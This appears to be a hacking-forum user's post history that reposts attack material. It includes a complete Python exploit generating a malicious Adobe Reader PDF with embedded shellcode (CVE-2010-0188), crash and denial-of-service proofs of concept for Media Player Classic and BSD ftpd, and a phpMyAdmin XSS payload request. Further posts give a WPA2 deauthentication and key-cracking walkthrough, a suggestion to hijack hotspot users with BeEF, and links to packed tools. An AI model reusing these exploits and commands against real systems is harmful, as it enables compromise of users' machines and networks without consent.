begood
Active Members - Posts: 3972 - Days Won: 22
Everything posted by begood

  1. __doc__='''
     Title: Adobe PDF LibTiff Integer Overflow Code Execution.
     Product: Adobe Acrobat Reader
     Version: <=8.3.0, <=9.3.0
     CVE: 2010-0188
     Author: villy (villys777 at gmail.com)
     Site: http://bugix-security.blogspot.com/
     Tested : successfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
     ------------------------------------------------------------------------
     '''
     import sys
     import base64
     import struct
     import zlib
     import StringIO

     SHELLCODE_OFFSET=1500
     TIFF_OFSET=0x2038

     # windows/exec - 227 bytes
     # http://www.metasploit.com
     # Encoder: x86/shikata_ga_nai
     # EXITFUNC=process, CMD=calc.exe
     buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4"
     buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63"
     buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98"
     buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1"
     buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5"
     buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56"
     buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0"
     buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a"
     buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6"
     buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60"
     buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff"
     buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c"
     buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff"
     buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e"
     buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff"
     buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2"
     buf += "\x09\xc1\x5f\x00"

     class CVE20100188Exploit:
         def __init__(self,shellcode):
             self.shellcode = shellcode
             self.tiff64=base64.b64encode(self.gen_tiff())

         def gen_tiff(self):
             # little-endian TIFF header, IFD offset at TIFF_OFSET
             tiff = '\x49\x49\x2a\x00'
             tiff += struct.pack("<L", TIFF_OFSET)
             tiff += '\x90' * (SHELLCODE_OFFSET)
             tiff += self.shellcode
             tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
             # IFD: entry count followed by the tag entries
             tiff += "\x07\x00\x00\x01\x03\x00\x01\x00"
             tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
             tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
             tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
             tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
             tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
             tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"
             tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"
             tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"
             tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"
             tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"
             tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"
             tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"
             tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"
             tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"
             tiff += "\x00\x07"
             return tiff

         def gen_xml(self):
             # XFA form with a single image field carrying the base64 TIFF
             xml= '''<?xml version="1.0" encoding="UTF-8" ?>
     <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
       <config xmlns="http://www.xfa.org/schema/xci/1.0/">
         <present>
           <pdf>
             <version>1.65</version>
             <interactive>1</interactive>
             <linearized>1</linearized>
           </pdf>
           <xdp>
             <packets>*</packets>
           </xdp>
           <destination>pdf</destination>
         </present>
       </config>
       <template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
         <subform name="topmostSubform" layout="tb" locale="en_US">
           <pageSet>
             <pageArea id="PageArea1" name="PageArea1">
               <contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
               <medium short="612pt" long="792pt" stock="custom" />
             </pageArea>
           </pageSet>
           <subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
             <break before="pageArea" beforeTarget="#PageArea1" />
             <bind match="none" />
             <field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
               <ui>
                 <imageEdit />
               </ui>
             </field>
             <?templateDesigner expand 1?>
           </subform>
           <?templateDesigner expand 1?>
         </subform>
         <?templateDesigner FormTargetVersion 24?>
         <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
         <?templateDesigner Zoom 94?>
       </template>
       <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
         <xfa:data>
           <topmostSubform>
             <ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
           </topmostSubform>
         </xfa:data>
       </xfa:datasets>
       <PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
       <form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
         <subform name="topmostSubform">
           <instanceManager name="_Page1" />
           <subform name="Page1">
             <field name="ImageField1" />
           </subform>
           <pageSet>
             <pageArea name="PageArea1" />
           </pageSet>
         </subform>
       </form>
     </xdp:xdp>
     '''
             return xml

         def gen_pdf(self):
             # the XFA packet is stored as a FlateDecode embedded stream
             xml = zlib.compress(self.gen_xml())
             pdf='''%PDF-1.6
     1 0 obj <</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
     stream
     ''' + xml+'''
     endstream
     endobj
     2 0 obj <</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
     endobj
     3 0 obj <</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
     endobj
     4 0 obj <</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
     endobj
     5 0 obj <</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
     endobj
     6 0 obj <</Kids [5 0 R]/Type /Pages/Count 1>>
     endobj
     7 0 obj <</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
     endobj
     8 0 obj <</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
     endobj
     xref
     trailer
     <</Root 7 0 R/Size 9>>
     startxref
     14765
     %%EOF'''
             return pdf

     if __name__=="__main__":
         print __doc__
         if len(sys.argv) != 2:
             print "Usage: %s [output.pdf]" % sys.argv[0]
             sys.exit(1)
         print "Creating Exploit to %s\n"% sys.argv[1]
         exploit=CVE20100188Exploit(buf)
         f = open(sys.argv[1],mode='wb')
         f.write(exploit.gen_pdf())
         f.close()
         print "[+] done !"
  2. yes. I made it because SympleBoy22 asked me to ^^
  3. @SympleBoy22 here: MEGAUPLOAD - The leading online storage and file delivery service 2shared - download [python][PE]_raw_-_Php_Proxy_Clicker_[cmiN]_rstcenter.rar file name : [python][PE]_raw_-_Php_Proxy_Clicker_[cmiN]_rstcenter.rar MD5 : 0b299d3877f7582c331bb93810ef5bf2 password : rstcenter.com
  4. I know there are already video tutorials out there, but this way I was pushing him to learn to make tutorials himself.
  5. If we have evolved this much in 20 years, it's clearly exponential growth; I can't even imagine what they'll come out with in 10 years.
  6. I made an "exe" version of this script, for those who don't have Python installed. http://www.2shared.com/file/12079495/6346e742/pythonPE_yidl_-_Yahoo_ID_Locke.html http://www.megaupload.com/?d=8DQNMH89 file name : [python][PE]_yidl_-_Yahoo_ID_Locker_[cmiN]_rstcenter.rar MD5 : 211ca83b5f16c0a74b95311cec645f3e password : rstcenter.com
  7. are you blind? I have 3 links to the source
  8. Penetration Testing Framework 0.57. It's a list with many, many tools. Go to the main page and on the left you have the best pentesting tools, nicely organized. poster : http://www.vulnerabilityassessment.co.uk/Framework.png
  9. #! /usr/bin/python
     #
     # #############################################################################
     # Media Player classic StatsReader (.stats file) stack buffer Overflow poc
     # Software Link: http://mpc-hc.sourceforge.net/download-media-player-classic-hc.html
     # Tested in : Windows XP SP3
     # Credit : ItSecTeam
     # mail : Bug@ItSecTeam.com
     # Web: WwW.ITSecTeam.com
     # Find by: PLATEN @ ItSecTeam
     # Special Thanks : M3hr@n.S - B3hz4d - Cdef3nder
     # patch: C:\Program Files (x86)\K-Lite Codec Pack\Tools\StatsReader.exe
     # Usage: ./stats-poc.py
     # #############################################################################
     #
     print """
     [~] Media Player classic StatsReader (.stats file) stack buffer Overflow poc
     [~] mail : Bug@ItSecTeam.com
     [~] Web: WwW.ITSecTeam.com
     [~] Find by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam
     """
     # oversized .stats file: 500000 'A' bytes
     data= "\x41" *500000
     try:
         file=open("media-poc.stats",'w')
         file.write( data )
         file.close()
         print ("[+] File created successfully: media-poc.stats" )
     except:
         print "[-] Error cant write file to system\n"
  10. /*
     FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability

     The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
     Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

     This issue affects the following releases:
     FreeBSD 8.0, 6.3, 4.9
     OpenBSD 4.5 and 4.6

     PoC:
     */
     #include <glob.h>
     #include <stdio.h>
     #include <string.h>   /* strcpy, memset */

     #define MAXUSRARGS 100
     #define MAXGLOBARGS 1000

     void do_glob()
     {
         glob_t gl;
         char **pop;
         char buffer[256];

         /* brace expansion pattern that ftpd's glob() handles badly */
         strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
         int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;

         memset(&gl, 0, sizeof(gl));
         gl.gl_matchc = MAXGLOBARGS;
         flags |= GLOB_LIMIT;

         if (glob(buffer, flags, NULL, &gl)) {
             printf("GLOB FAILED!\n");
             return;
         } else
             // for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
             for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1); pop++) {
                 printf("glob success");
                 return;
             }
         globfree(&gl);
     }

     int main(int argc, char **argv)
     {
         do_glob();
         do_glob();
         return 0;
     }
  11. Enhanced Interior Gateway Routing Protocol (EIGRP) cheatsheet. Version 2.0. b46dfa36f672393548cb496de302680b .:[ packet storm ]:. - http://packetstormsecurity.org/
     First Hop Redundancy cheatsheet. Version 2.0. e9af68fbc0725c91633fb0cf1fcb47ae
     IEEE 802.11 WLAN cheatsheet. Version 2.1. df57f1abe5751ba1bc9f04d7133750e2
     IEEE 802.1X cheatsheet. Version 2.0. c129739bbcc786a52d89501ec0342655
     Cisco IOS IPv4 Access Lists cheatsheet. Version 2.0. 22e0fbde4a4ce858110469fbea8ebdf8
     Cisco IOS Interior Routing Protocols cheatsheet. 9d5abb97e31c1e9636c2af341577182c
     IPsec cheatsheet that discusses protocols, encryption algorithms, and more. Version 2.0. 0dec8bafc1756b3fcc274c33d26e15bb
     IPv4 Multicast cheatsheet. Version 2.0. 4e5eeecf53400a4072817bb413c80874
     IPv4 subnetting cheatsheet. Version 2.0. 5e4f67f4d950de8899743aacf4bb5d03
     IPv6 cheatsheet that touches on everything from transition mechanisms to the protocol header. Version 2.0. 7305603194b5a30cc8eec42c70260ea8
     IS-IS cheatsheet that documents NSAP addressing, the protocol header, and more. Version 2.0. 409c063eaeaadc6529f4db4805d015f0
     Markdown cheatsheet. Version 2.0. To be used with the project from daringfireball.net. 86a3e02a213634bcd316b72c7078254c
     MediaWiki cheatsheet. Version 2.1. 0cb5107e030605f2b5fd5d6dc9fe16a9
     Network Address Translation (NAT) cheatsheet. Version 1.0. 134e2f7d6b8d22d2c64bde1fed67ab1f
     Open Shortest Path First (OSPF) cheatsheet. Version 2.1. 889d4df78579ed45e4f4f9bf8530b161
     Point-To-Point (PPP) cheatsheet. Version 1.01. b66a96c25b627c4bad21df7c4a7bdbba
     Quality of Service (QoS) cheatsheet. Version 2.0. cdc307d92f1f39b805866611a8e883bd
     Spanning Tree cheatsheet. Version 2.0. 248f2c830ddc58dd59b3e113cca2c4b8
     Virtual LAN (VLAN) cheatsheet. Version 2.0. f85d37502b395429c19b57e92f927570
     Wireshark Display Filters cheatsheet. Version 2.0. 5be0f7e39fb4a7f8ec90b34bfa08e1b2
     Common Ports cheatsheet. Version 1.1. 0533135bcf5befcbfb863a9e756b30e0
     Physical Terminations cheatsheet. Version 1.1. 4ec64869a3343e89c630673c8791b234
     tcpdump cheatsheet that gives a good layout of command line options, filter primitives, and more. Version 2.0. 9169b5f5d91e5f8f43bb839968a68a23
  12. I'm curious too, tell me what you manage / don't manage to do.
  13. PHP Charset Encoder
  14. there is an xss in phpmyadmin 3.3.0 when we create a new database in the interface, the "new_db" parameter does not filter characters when users enter them. an attacker can enter malicious code, like "<script>alert(/liscker/);</script>". it can also be true in post and get. but in post, we can not encode the xss code, or the xss will fail.

     For example:

     GET:
     http://localhost/phpmyadmin/db_create.php?token=567eb60e7b1692f64df9251ab7ae3934&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=

     POST:
     POST /phpmyadmin/db_create.php HTTP/1.1
     Accept: */*
     Referer: http://localhost/phpmyadmin/db_create.php
     Accept-Language: zh-cn
     Content-Type: application/x-www-form-urlencoded
     UA-CPU: x86
     Accept-Encoding: gzip, deflate
     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)
     Host: localhost
     Content-Length: 123
     Connection: Keep-Alive
     Cache-Control: no-cache
     Cookie: phpMyAdmin=95830e770d0f213c04d63b623940f46f95c6f571; pma_lang=en-utf-8; pma_charset=utf-8; pma_collation_connection=utf8_general_ci; pmaUser-1=Hfd255%2Bp2dc%3D; pma_navi_width=200; pmaPass-1=MlPzQC8J2iY%3D; pma_fontsize=82%25; pma_theme=original

     token=759f7a380111a292995ec447408bbdb3&reload=1&new_db=%3Cscript%3Ealert%28%2Fliscker%2F%29%3B%3C%2Fscript%3E&db_collation=

     When you test, please replace the session "759f7a380111a292995ec447408bbdb3" with your own. I suggest testing it in the interface.

     Liscker
     SecurityFocus
  15. The latest version of the Zeus do-it-yourself crimeware kit goes to great lengths to thwart would-be pirates by introducing a hardware-based product activation scheme similar to what's found in Microsoft Windows. The newest version with bare-bones capabilities starts at $4,000 and additional features can fetch as much as $10,000. The new feature is designed to prevent what Microsoft refers to as "casual copying" by ensuring that only one computer can run a licensed version of the program. After it is installed, users must obtain a key that's good for just that one machine. "This is the first time we have seen this level of control for malware," according to an analysis of the latest Zeus version published this week by SecureWorks. The hardware-based licensing system isn't the only page Zeus creators have borrowed from Microsoft. They've also pushed out multiple flavors of the package that vary in price depending on the capabilities it offers. Just as Windows users can choose between the lower-priced Windows 7 Starter or the more costly Windows 7 Business, bot masters have multiple options for Zeus. For a mere $500 more, users can get a Zeus module that will allow them to receive pilfered data in real time using the Jabber instant messaging client. A module that grabs data out of fields typed into Firefox fetches an extra $2,000, and a virtual network computing module that allows users to establish a fully functioning connection to an infected computer costs $10,000. The VNC functionality fetches such a high price because it allows criminals to bypass some of the most advanced security measures, such as smartcards and other pieces of hardware that are used to authenticate high-value victims to a bank or other financial institution. The latest version of Zeus is 1.3.3.7, SecureWorks researcher Kevin Stevens told El Reg. But the authors are already busy working on version 1.4, which is being beta tested.
     It offers polymorphic encryption that allows the trojan to re-encrypt itself each time it infects a victim, giving each one a unique digital fingerprint. As a result, anti-virus programs, which already struggle mightily to recognize Zeus infections, have an even harder time detecting the menace. Trojan armed with hardware-based anti-piracy control - The Register // how dry
  16. note that the link is tied to the session -> only you can see it for a while, other people can't view it, the link being active only on one IP.
  17. gom player.
  18. Basic steps :
     * Put interface in monitor mode
     * Find wireless network (protected with WPA2 and a Pre Shared Key)
     * Capture all packets
     * Wait until you see a client and deauthenticate the client, so the handshake can be captured
     * Crack the key using a dictionary file (or via John The Ripper)

     I'll use a Dlink DWL-G122 (USB) wireless network interface for this procedure. In backtrack4, this device is recognized as wlan0.

     First, put the card in monitor mode :

     root@bt:~# airmon-ng
     Interface Chipset Driver
     wifi0 Atheros madwifi-ng
     ath0 Atheros madwifi-ng VAP (parent: wifi0)
     ath1 Atheros madwifi-ng VAP (parent: wifi0)
     wlan0 Ralink 2573 USB rt73usb - [phy0]

     root@bt:~# airmon-ng start wlan0
     Interface Chipset Driver
     wifi0 Atheros madwifi-ng
     ath0 Atheros madwifi-ng VAP (parent: wifi0)
     ath1 Atheros madwifi-ng VAP (parent: wifi0)
     wlan0 Ralink 2573 USB rt73usb - [phy0] (monitor mode enabled on mon0)

     Ok, we can now use interface mon0.

     Let's find a wireless network that uses WPA2 / PSK :

     root@bt:~# airodump-ng mon0
     CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57
     BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
     00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet
     BSSID STATION PWR Rate Lost Packets Probe
     00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

     Stop airodump-ng and run it again, writing all packets to disk :

     airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

     At this point, you have 2 options : either wait until a client connects and the 4-way handshake is complete, or deauthenticate an existing client and thus force it to reassociate. Time is money, so let's force the deauthenticate. We need the bssid of the AP (-a) and the mac of a connected client (-c)

     root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
     13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
     13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

     As a result, airodump-ng should indicate "WPA Handshake:" in the upper right corner

     CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
     BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
     00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
     BSSID STATION PWR Rate Lost Packets Probe
     00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

     Stop airodump-ng and make sure the files were created properly

     root@bt:/# ls /tmp/wpa2* -al
     -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
     -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv
     -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

     From this point forward, you do not need to be anywhere near the wireless network. All cracking will happen offline, so you can stop airodump and other processes and even walk away from the AP. In fact, I would suggest to walk away and find yourself a cosy place where you can live, eat, sleep, etc.... Cracking a WPA2 PSK key is based on bruteforcing, and it can take a very very long time.

     There are 2 ways of bruteforcing : one that is relatively fast but does not guarantee success and one that is very slow, but guarantees that you will find the key at some point in time.

     The first option is by using a wordlist/dictionary file. A lot of these files can be found on the internet (e.g. www.theargon.com or on packetstorm (see the archives)), or can be generated with tools such as John The Ripper. Once the wordlist is created, all you need to do is run aircrack-ng with the wordlist and feed it the .cap file that contains the WPA2 Handshake. So if your wordlist is called word.lst (under /tmp/wordlists), you can run

     aircrack-ng -w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

     The success of cracking the WPA2 PSK key is directly linked to the strength of your password file. In other words, you may get lucky and get the key very fast, or you may not get the key at all.

     The second method (bruteforcing) will be successful for sure, but it may take ages to complete. Keep in mind, a WPA2 key can be up to 64 characters, so in theory you would have to build every password combination with all possible character sets and feed them into aircrack. If you want to use John The Ripper to create all possible password combinations and feed them into aircrack-ng, this is the command to use :

     root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

     (Note : the PSK in my testlab is only 8 characters, contains one uppercase character and 4 numbers). I will post the output when the key was cracked, including the time it required to crack the key.

     That's it

     Update : after 20 hours of cracking, the key still has not been found. The system I'm using to crack the keys is not very fast, but let's look at some facts : 8 characters, plain characters (lowercase and uppercase) or digits = each character in the key could have 26+26+10 (62) possible combinations. So the maximum number of combinations that need to be checked in the bruteforce process is 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896. At about 600 keys per second on my "slow" system, it could take more than 101083382 hours to find the key (11539 years). I have stopped the cracking process as my machine is way too slow to crack the key while I'm still alive... So think about this when doing a WPA2 PSK Audit.

     http://www.corelan.be:8800/index.php/2009/02/24/cheatsheet-cracking-wpa2-psk-with-backtrack-4-aircrack-ng-and-john-the-ripper/
  19. +1. from the beginning.
  20. bah, smart guy, that's where you find all the conversations with all the users you have in your list. obviously the archive isn't under your name (nick). look for the "id" of the person you talked to, that will be the folder where the log is kept.
  21. %programfiles%\Yahoo!\Messenger\Profiles\[username]\Archive\Messages
  22. BeEF is the browser exploitation framework. A professional tool to demonstrate the real-time impact of browser vulnerabilities. Development has focused on creating a modular structure making new module development a trivial process with the intelligence residing within BeEF. Current modules include the first public Inter-protocol Exploit, a traditional browser overflow exploit, port scanning, keylogging, clipboard theft and more. The modules are aimed to be a representative set of current browser attacks - with the notable exception of launching cross-site scripting viruses. You can download BeEF from Bindshell.net. Though BeEF can be used to exploit computers located anywhere on the Internet (e.g. by setting up a malicious site) and on the local LAN (e.g. use a simple MITM to send the payload), I particularly feel it would be very useful in compromising computers in hotspot destinations. Here is a simple use case - A hacker can set up a Honeypot advertising a local hotspot in the vicinity such as tmobile, google-wifi or starbucks. An unsuspecting user successfully connects to this honeypot and fires up his browser to check his web email. The hacker redirects the user and serves him a malicious page using BeEF. User gets 0wned. Below are 2 videos about the BeEF framework: the first is a simple walk-through on how to get started with BeEF on Backtrack 4 and how one can detect if the victim has flash and java installed; the second video is a demo of the MS09-002 exploit using BeEF. Browser Exploitation Framework (BeEF) Tutorial